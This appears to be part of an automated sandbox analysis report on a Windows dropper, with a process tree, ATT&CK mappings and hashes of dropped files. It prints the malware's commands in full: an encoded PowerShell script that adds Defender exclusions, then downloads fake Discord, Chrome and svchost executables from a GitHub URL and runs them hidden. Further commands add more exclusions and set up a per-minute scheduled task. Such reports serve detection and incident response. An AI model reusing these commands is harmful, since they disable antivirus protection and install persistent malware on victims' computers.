HAEEARwBrAEEAYgBBAEIAbABBAEMAQQBBAEoAQQBCAHMAQQBHADgAQQBZAHcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAGIAQQBEAEkAQQBYAFEAQQBLAEEARQBrAEEAYgBnAEIAMgBBAEcAOABBAGEAdwBCAGwAQQBDADAAQQBWAHcAQgBsAEEARwBJAEEAVQBnAEIAbABBAEgARQBBAGQAUQBCAGwAQQBIAE0AQQBkAEEAQQBnAEEAQwAwAEEAVgBRAEIAeQBBAEcAawBBAEkAQQBBAGsAQQBIAFUAQQBjAGcAQgBzAEEARABRAEEASQBBAEEAdABBAEUAOABBAGQAUQBCADAAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEASQBBAEEAawBBAEcAdwBBAGIAdwBCAGoAQQBHAEUAQQBkAEEAQgBwAEEARwA4AEEAYgBnAEIAegBBAEYAcwBBAE0AdwBCAGQAQQBBAG8AQQBDAGcAQgBtAEEARwA4AEEAYwBnAEIAbABBAEcARQBBAFkAdwBCAG8AQQBDAEEAQQBLAEEAQQBrAEEARwB3AEEAYgB3AEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEARwBrAEEAYgBnAEEAZwBBAEMAUQBBAGIAQQBCAHYAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEgATQBBAEsAUQBBAGcAQQBIAHMAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEYATQBBAGQAQQBCAGgAQQBIAEkAQQBkAEEAQQB0AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHoAQQBIAE0AQQBJAEEAQQB0AEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAFUAQQBCAGgAQQBIAFEAQQBhAEEAQQBnAEEAQwBRAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAWABBAEcAawBBAGIAZwBCAGsAQQBHADgAQQBkAHcAQgBUAEEASABRAEEAZQBRAEIAcwBBAEcAVQBBAEkAQQBCAEkAQQBHAGsAQQBaAEEAQgBrAEEARwBVAEEAYgBnAEEAZwBBAEMAMABBAFYAdwBCAGgAQQBHAGsAQQBkAEEAQQBLAEEASAAwAEEAIgA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4788
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcATwBXADYANAAnACIACgBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AQwBvAG0AbQBhAG4AZAAgACIAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwAnACIACgAKACQAdQByAGwAMQAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8ARABpAHMAYwBvAHIAZAAuAGUAeABlACcACgAkAHUAcgBsADIAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEEAbQBqAGEAZABCAGEAbABsAHMALwBUAEUAUwBUAC8AcgBhAHcALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEcAbwBvAGcAbABlAEMAaAByAG8AbQBlAC4AZQB4AGUAJwAKACQAdQByAGwAMwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAKACQAdQByAGwANAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBtAGoAYQBkAEIAYQBsAGwAcwAvAFQARQBTAFQALwByAGEAdwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcACgAKACQAbABvAGMAYQB0AGkAbwBuAHMAIAA9ACAAQAAoAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABEAGkAcwBjAG8AcgBkAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABHAG8AbwBnAGwAZQBDAGgAcgBvAG0AZQAuAGUAeABlACcALAAKACAAIAAgACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAEQAbwB3AG4AbABvAGEAZABzAFwAZQB4AHAAbABvAHIAZQByAC4AZQB4AGUAJwAsAAoAIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwAKACkACgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADEAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMABdAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGwAMgAgAC0ATwB1AHQARgBpAGwAZQAgACQAbABvAGMAYQB0AGkAbwBuAHMAWwAxAF0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAzACAALQBPAHUAdABGAGkAbABlACAAJABsAG8AYwBhAHQAaQBvAG4AcwBbADIAXQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsADQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGwAbwBjAGEAdABpAG8AbgBzAFsAMwBdAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGwAbwBjAGEAdABpAG8AbgAgAGkAbgAgACQAbABvAGMAYQB0AGkAbwBuAHMAKQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAbABvAGMAYQB0AGkAbwBuACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAKAH0A
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2480
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5596
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5744
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6008
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5348
      - C:\Users\Public\Downloads\Discord.exe
        
        "C:\Users\Public\Downloads\Discord.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\Discord.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Discord'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5232
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\ProgramData\Discord"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5920

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2596

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1848

C:\ProgramData\Discord
"C:\ProgramData\Discord"
1⤵
- Executes dropped EXE
PID:5780

C:\ProgramData\Discord
"C:\ProgramData\Discord"
1⤵
- Executes dropped EXE
PID:5652

C:\ProgramData\Discord
"C:\ProgramData\Discord"
1⤵
- Executes dropped EXE
PID:2952

C:\ProgramData\Discord
"C:\ProgramData\Discord"
1⤵
- Executes dropped EXE
PID:728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Discord.log

Filesize
654B

MD5
11c6e74f0561678d2cf7fc075a6cc00c

SHA1
535ee79ba978554abcb98c566235805e7ea18490

SHA256
d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

SHA512
32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
713ad359b75fe6d947468ec1825202b9

SHA1
19dcd19f18a2ad6deb581451aad724bd44a592a4

SHA256
56572269ec031c63d966c6d3b4712600b908d38826c59c0f9a8225d0a783e9f4

SHA512
4df344dec422bed85b186909dc7f9c35126b3bb45e100f18fb95b4a9943ace242479adf5f0194b054d38b67032498f897a5a54b49026efee0c4797cb5a5e54e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c58ccb4da696442ae40d3db9e4b41c3f

SHA1
e27933a94d57f04c75b8bff25ad7012171917f87

SHA256
d0d75be801bf0c5f715665c73214bfa38fd714dd9ee846de410855d96dd75931

SHA512
82a7cd39758d67f1d177ce7f46a5ee560eb60207ca7ca1e39b9a08a269ed140532bf1ec85899a033a54d20a0d59592d1cd5f5d35f71da98f6b6e35cd904e1872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ef0e81b130f8dcf42e80097a75e5d04d

SHA1
d8694b7c5fba1ee2e73e69dd7790ca5b1cb882db

SHA256
fc53158d948d1742e3f960124f9fdb138eaa4aa711d0f43833fa893247de4918

SHA512
c85df1696537dfce601de46183b1b22d7f0007b0f695f1904bbd1a6e429d7787c3d6199bcecdb21936d811b35eeca57a9800bcd3a3b585569aabeb0b5b497efd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
181B

MD5
b7c15308d582666aad00433800636623

SHA1
746de1be1f7d0a57073bfc8555d1a50c0ceb8481

SHA256
2ef8ed1741d6e991e025e5fed5d2a4157bf475e338f088d17b558751556afa40

SHA512
4fea2b1f5b6db06a75ddb61e90709e1db61efe0a20836acf42a656f3d622223a9961b363a88b31289f03b6494aab7c690e8845aa8f94b9819c344e850e4d591d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe5910fe.TMP

Filesize
59B

MD5
2800881c775077e1c4b6e06bf4676de4

SHA1
2873631068c8b3b9495638c865915be822442c8b

SHA256
226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

SHA512
e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
de3c285bdc7c662bb3fc4b8d22b444e9

SHA1
d9161d54dbbdc15258451059b1e40b9fe1d89f35

SHA256
205593b6779099866e707c03d3ec6a06388ef6aa5b70ec51f70e7c3ad6472e8c

SHA512
0cc4ada8cfb7ea543a4990f98e6bfca6117243cecb7bd8ca55d4223ec2946d047c8188ff91ce0d1e70db83ac4dd27ccf199f2a0ab15e3f63119f37a452047224

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
9ceb376638dd82129f22feb44ddec649

SHA1
386a3c20cbd83655b8ec9d463d7455ec1fa17741

SHA256
b31957504c778119b9412f0d27de6cf60e8d0336951eb024beb2fc653d90b446

SHA512
69a0ca046f16f873d20d5c9b332d2152486a7536fb064709a06f903d7034819b2143f5c00d55e11c4564aeb7f1d542b2d1aaec14465c9d140ddf1d84509a969c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
31575f001b96ac32e516e29561f8f95c

SHA1
731df4fa0e5356c938fef8e6cc8e054a4d9d8731

SHA256
2742eff689e2d193bae975efe97c9f58549bcb7fe0b0f9f48338ce1616bcbf24

SHA512
96e25499e69a1cfac4b29793fbba6f5daaf9eba45b0ea4474a14f0c6170af6c8eb19968fe188905587224c33cf62481505c051ec7d415ebdb3783632e4d379d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
62aee047a3c6cf2fec2a29a34157633b

SHA1
51b6eed704d65a62d8793ea18885d12aa39a5cf2

SHA256
342e67b65a4070bbd6e7c2fbf75c98e727d9db45fa071181cae0f5eade726ddf

SHA512
21ee4907a0dcf077f9233542462b8bfd01d976dc1fe4a7b7c4ad70d691e7b9101bddcc292e13fc83a22f56355aa5b93949ac124c84da1f43a80851bf313d895e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
a18e33a424007376b810134dde07fec6

SHA1
3acbb4070e7fab6fea0f6c618aeca0964e39f7f8

SHA256
12852fe3bc04c3a3f6cdb76d7fa37cf0d7f91ffe801c70caf5ee4f5bb34e2821

SHA512
3a08afee6762546ba967965d72b90a0e0ed2a45bee0e195696c92f511c4b92634acdb669e6320359cb436e809c9672c0371042990aaf26b90da06da523ce6b9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
a2ebed13749dcc0ce109f1b99428fe7a

SHA1
ba7a99bff84537a96dd0c645953b5e0a7aac5b02

SHA256
30f80182b77d31acb443458928df0306f5efb81b20e98468be386b2a715d517d

SHA512
4468dac839189fe5ea9bf2275bc69881d5b113e2a9d2665e5e23a28d131d09c3a16403be3db80774f51afd1927a7b947fc50a50a6badc6444212903b6021045d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
379bf15bf479d98be6da331a40cdfe23

SHA1
4e7d6f609b680420f07541921b6a4a11e4c4781d

SHA256
ea758e14f5c1687de373aeee58182f2b4bfcdd061b5ed8a94f9e404badc7fa3d

SHA512
7e1b8cb06a29f141aa1a7bd79225f69972b6e42dc0d57ccb3987112b6562fc06d534e6b27874e887a23046b39774e2fec0ae50a5b983d18d5a2645ae7ea6de0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4e78029926f09dd649c9e22d3363a196

SHA1
a0fac93ccc3505d9e6857b88f407eab164e49c34

SHA256
139b33af77e785669116fa61214dc8d959944a478e718ad3e90cb4f52bf32b1c

SHA512
5335f3eaad27499d9ecb6f3ec42e3c84d2293eeb2f3d64a72ce42a3d4ebf54793b9c179e39119bd27656c366deae946e231070cb5a00f09e2e7101e908f93039

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9ebc7f7c04f44740b956e288115b071d

SHA1
ad1ea91230bfd5da24e7b9cc4bc59d33b8f21cea

SHA256
03013765b48a311a97f8db45cb108c0c56c4f4b4d891d19d8e78b335e4188d08

SHA512
2bb80e5ab08156c809c4b8efa1b402b6ad0ef3786558e9ad8c856248a5d18748ab9fcaa17e13093b8d9a30fff587d8b5ef59ae8cc8068cf2ad135ed4005c4478

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
03aa6911fecf3f0923ee454c47b948f7

SHA1
99205d2a61521238892647bbc232e0da4a1473a3

SHA256
39e73c21e8ef39e35252a5dc1f8ec0a0d646653cd285a3a97a09c2b8d54c38a1

SHA512
84190cfda72e45a1cf612a27de19421301b8c1777f065b305dbcef7359254820ed634e941f4fb4c865cc2f32773a11ad80123d27ad59876a2c051889d06c5b26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4f5eb0d6646bf171482725f7d29a8758

SHA1
f585ce2b573a48a25c72e071d462e34b73b1c5ff

SHA256
a03e6b80b5d48e9fc8d8c6479ffa41cb3119bfbcc7a405a7034ef637045bc84c

SHA512
c159648a40f4bb708ad651edc48424af0d0034752554e3ae1cb000900dc6cef52958f3356389fde9aa22ff9bc279964b568d88a4b2f7500ff14dd2ea8a20bc6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4816d1848d7eebaa881bae9fdd4f932

SHA1
6097a2839f6063568d47475bf08fb79deb17b1da

SHA256
3731000089b4462def922daad4f5bcfe243ce8c784afd404599a7e5474abb754

SHA512
bedcc3f98d13a2a6543a30eda117f12b36d9484c88f05718bcb10dd3cd30cb4add9344b919efc619467e414b9a8bf94bb5ccc304d3e64c82efb0884cca14f66d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e0c997f26ad63f3e1994e3bd2fd5e642

SHA1
0b4ae4a5f341ca96910429e4c5d019c4ebe256da

SHA256
8cf9593604da0941da1eeb1d84fc32741bbe47639dc37ff60bcaffedc5b96b9f

SHA512
9730e48e704da7d3f86ba48eee9ba2ff5b13cbfbda4635bd3b1447481a60c5c7ae9aff8abfca6e2e355d76a73352cbee43f109b81435b5d6cdb354f77460e3c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\0sb5rtez\0sb5rtez.dll

Filesize
3KB

MD5
8758ee9de21159fbcd5e851aaada85a2

SHA1
d8df8847bd97fd81ed3e304b3167725d7a2b6c03

SHA256
457c574f8d8331e47ba95f2590d93b244458ace91eadebd08456e17264a6dd50

SHA512
5f5d78044382ef7965259d8d218c9eef46548186dee9a21b3d8697dc92bc5cc0f992fcbc49926a35239707d6f1e992eff1f643207de65d7d897521b2a8c6a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF86A.tmp

Filesize
1KB

MD5
6af2d2aa5c16adf7deacf8f805aaa241

SHA1
39d9f31205b4959af12fa04d37f16fca0cdb51c4

SHA256
68c8e430c9c1b239df262629593640d57780645fb67ac55fbc4a9638b78150bf

SHA512
634c1dd2b91ca40802c8a48082dba47dd3820b47338bd60e78c812120fd5ebabbd6338b44a0b14a318ebe0dac094fea380870535829d72a380c70ad174ebf402

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dhjfj2gm.nwp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
7897fc7b06bb8cd01fbf356d2c446208

SHA1
ffbed2f12843c654737af5799543c234f57c4d7d

SHA256
b3a286db43a0309bc122f179c4b63f33592cd4c81fbbaacbc47b6a600c13fea4

SHA512
8ff44a5f0071720489efd24f86b53950e62fc6ffe61d562c9946610240f1f53d872ca815fbec46f0e54f8e8fc916a13795dc1d68df916328af63f6f8ac028bb6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
a9065a8f2351ab7e7afca0cf3539d44e

SHA1
07eb7485139d02a0c7021b81863c4e9f98504c04

SHA256
63b9a9f3de3f9f96dd84041e1d344e23329e7f92b59ff16c2bb0b583d8218caa

SHA512
10ca94da82024036f04109e28ac348d1a7f094d88fc1befc6eec25e9b5987c220086d4c92258867693395a740700d1e126573ee7613dbdb09cfb4ac3eb730169

Download Submit
